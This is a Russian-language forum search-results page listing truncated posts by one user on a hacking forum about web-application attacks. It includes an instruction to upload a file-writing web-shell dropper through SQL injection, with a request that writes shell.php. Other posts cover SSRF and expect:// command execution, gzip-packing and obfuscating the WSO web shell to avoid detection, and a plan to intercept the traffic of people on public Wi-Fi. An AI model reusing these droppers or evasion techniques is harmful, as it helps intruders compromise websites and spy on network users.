Вернуться   RDot > Поиск по форуму

Показано с 1 по 10 из 10.
На поиск затрачено 0.00 сек.
Поиск: Сообщения от: shampoo
Раздел: Web-среда/Web-applications 10.05.2014, 12:31
Ответов: 4
Просмотров: 10,990
Автор shampoo
SSRF, DDoS, Iternal Network Scan, а также, если...

SSRF, DDoS, Iternal Network Scan, а также, если повезет, в PHP можно встретить: expect://cmd
Раздел: Web-среда/Web-applications 12.04.2014, 12:17
Ответов: 3,618
Просмотров: 3,029,200
Автор shampoo
Через SQLi залей не eval($_REQUEST[x]), а...

Через SQLi залей не eval($_REQUEST[x]), а file_put_contents($_POST[a], base64_decode($_POST[b]));

1.php?a=shell.php&b=PD9waHAgLy93c28gPz4=
Раздел: Форумы 31.03.2014, 14:12
Ответов: 15
Просмотров: 51,052
Автор shampoo
Лол, raz0r упоминал об этом еще 4 года назад, а...

Лол, raz0r упоминал об этом еще 4 года назад, а патч только сейчас?
http://raz0r.name/obzory/novye-sposoby-obxoda-waf-i-php-eksploity/

Ps: Да и нет сейчас там интересных мейджик методов. По...
Раздел: Целевые системы/Target systems 16.01.2014, 20:17
Ответов: 59
Просмотров: 65,423
Автор shampoo
У нас была такая стратегия атаки: Дана...

У нас была такая стратегия атаки:
Дана публичная сеть(кафе, бар и т. д.), необходимо детально послушать тех, кто пользуется сетью.
Собирается чемоданчик, в котором ноут + мощная точка доступа +...
Раздел: Web-среда/Web-applications 08.12.2013, 07:16
Ответов: 23
Просмотров: 35,105
Автор shampoo
а ты просто magic_quotes выруби на сервере, а то...

а ты просто magic_quotes выруби на сервере, а то при посте данных кавычки заковычиваются, вот и не получилось.
Раздел: Релизы/Releases 20.11.2013, 17:40
Ответов: 249
Просмотров: 521,809
Автор shampoo
нужно сделать magic_quotes_gpc=Off

нужно сделать magic_quotes_gpc=Off
Раздел: Релизы/Releases 16.11.2013, 19:33
Ответов: 249
Просмотров: 521,809
Автор shampoo
для простоты всё ж оформил в виде веб кода: ...

для простоты всё ж оформил в виде веб кода:


<?php

if(isset($_POST['php_code'])) :

header('Content-Disposition: attachment; filename=encoded.php');
echo php_pack($_POST['php_code']);...
Раздел: Релизы/Releases 16.11.2013, 19:03
Ответов: 249
Просмотров: 521,809
Автор shampoo
colobos Ребят, ну вы хоть чучуть мозги...

colobos
Ребят, ну вы хоть чучуть мозги включайте, всё таки техфорум.
Я приложил простые 30 строк кода, которые берут ваш WSO, гзипят его и генерируют самораспаковывающий этот gzip код на php,...
Раздел: Релизы/Releases 04.11.2013, 11:10
Ответов: 249
Просмотров: 521,809
Автор shampoo
Там как бы евал в начале, достаточно в код...

Там как бы евал в начале, достаточно в код глянуть.
Раздел: Релизы/Releases 30.10.2013, 15:33
Ответов: 249
Просмотров: 521,809
Автор shampoo
вот накидал простенький вариант в гзипе,...

вот накидал простенький вариант в гзипе, обфусцируй распаковщик, чтобы не было строк и юзай:

<?php

echo php_pack(
"<?php echo md5(123456); ?>"
);


///
Показано с 1 по 10 из 10.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot